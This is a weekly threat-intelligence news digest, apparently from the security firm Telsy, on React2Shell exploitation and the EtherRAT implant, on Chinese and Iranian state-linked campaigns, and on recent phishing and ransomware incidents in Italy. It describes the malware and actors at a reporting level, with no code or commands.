Developments in the APT landscape, new campaigns and previously unseen malware, multiple data breaches reported

Critical vulnerabilities in n8n, Italy in the crosshairs of phishing and ransomware activity, the latest from China

 View all
Threat Intelligence, News

Updates on React2Shell exploitation, the latest from Beijing and Tehran, new attacks in Italy

Weekly Threats hor Telsy

React2Shell: EtherRAT and other malware delivered in state-sponsored and cybercrime activity

During a recent attack based on the exploitation of the critical vulnerability CVE-2025-55182 (known as React2Shell), security researchers identified a novel implant dubbed EtherRAT featuring sophisticated capabilities, including C2 communication via Ethereum smart contracts, the implementation of five independent Linux persistence mechanisms, and the download of its own Node.js runtime from nodejs[.]org. The malware was retrieved on 5 December 2025 from a compromised Next.js application, just two days after the public disclosure of React2Shell, a Deserialization of Untrusted Data vulnerability in Meta’s React Server Components (RSC) that enables unauthenticated remote code execution through a single HTTP request, impacting the React 19 ecosystem and frameworks that implement it, such as Next.js 15.x and 16.x. Additional analysts documented broader exploitation by identifying four distinct malware families. In addition to the gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh script used for EtherRAT, three others were recovered: tsd.sh, which establishes persistence via /etc/cron.hourly/ with an rc.local fallback; init.sh, which downloads a payload from an AWS S3 bucket, installs it in /usr/infju/system_os, and establishes persistence with systemd and cron for a forced daily reboot; and b.sh, which acts as a loader using gzip compression and Base64 encoding. While the first researchers associate EtherRAT with high confidence to North Korean attackers, based on significant overlaps with the Contagious Interview campaign and Node.js runtimes characteristic of the BeaverTail malware (both associated with Lazarus Group), the latter assess that the data are insufficient to make a definitive attribution. Early exploitation activity revealed infrastructure attributable to the Beijing-linked APTs Earth Lamia and Jackpot Panda, while other researchers documented deployments of Cobalt Strike, Mirai, Noodle RAT (a backdoor likely used by Chinese-speaking groups involved in both espionage and cybercrime activities), BPFDoor (attributed to Red Menshen), Auto-Color, as well as SNOWLIGHT and VShell consistent with the activities of UNC5174 (CL-STA-1015), an Initial Access Broker presumably linked to the Ministry of State Security (MSS). Moreover, in the hours immediately following the public disclosure of React2Shell, opportunistic and large-scale exploitation operations were observed against exposed Next.js applications, characterized by the delivery of automated payloads aimed at distributing multi-stage loaders. Analysis of the latter highlights a rapid diversification of payloads and the absence of selective targeting, indicative of an initial phase of mass exploitation conducted by distinct attackers. In conclusion, the landscape reflects multi-adversary activity in which North Korean groups, Chinese actors, and cybercrime attackers rapidly weaponized CVE-2025-55182 for different objectives.

 

State-sponsored: new activity associated with Beijing and Tehran

CISA, the NSA, and the Canadian Centre for Cyber Security assess that Beijing-backed adversaries are using the BRICKSTORM malware, previously attributed to UNC5221, to maintain persistence on victims’ VMware vSphere servers. Target organizations primarily operate in the government services and facilities and information technology sectors. The ValleyRAT backdoor, previously associated with Chinese adversaries such as Void Arachne, has undergone in-depth analysis revealing its transformation from an APT tool into a publicly accessible malware framework. Analysts discovered the builder, leaked several months ago, and the threat’s development structure. The wide availability of both suggests increasingly broad and diversified use of the malware in the near future, beyond the confines of Beijing-backed APTs. Shifting to Iran, MuddyWater conducted espionage campaigns against targets in Turkey, Israel, and Azerbaijan leveraging the novel UDPGangster backdoor. One of the phishing emails identified masquerades as originating from the Ministry of Foreign Affairs of the Turkish Republic of Northern Cyprus and invites recipients to an online seminar titled “Presidential Elections and Results”. Attribution to the Tehran-linked APT is reinforced by the detection of an IP address shared by UDPGangster with the Phoenix backdoor, previously associated with this adversary.

 

Italia: cybercrime offensives target the country

Over the past week, several phishing campaigns targeting Italy were tracked. Among these is a thread hijacking operation aimed at organizations based in the national territory, intended to carry out Business Email Compromise (BEC) financial fraud. Another campaign exploits compromised email accounts of users belonging to the Public Administration (PA) to target other PA users. Victims are redirected to a legitimate Figma page requesting login via email or Google authentication. Finally, another campaign involves sending an email with the subject “R: Urgent – List of scholarship recipients”, which redirects recipients to a fake portal of the Ministry of University and Research (MUR) with the aim of exfiltrating credentials of students and staff from several Italian universities. Turning to the ransomware landscape, the LockBit Team claimed on its leak site the attack against Milano Ristorazione S.p.A. on 24 November 2025, as well as the compromise of Iscot Italia S.p.A., specializing in technical cleaning, maintenance, and industrial logistics, and the Municipality of Balmuccia (VC). The DATACARRY operator claimed a breach of the fashion company Camomilla Italia; while the Qilin Team claimed the Italian logistics and transport company specializing in cold goods Capuano Distribuzione Fresco. 

 

Weekly Threats is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.

The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.

Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.

Discover more about our Cyber Threat Intelligence solution.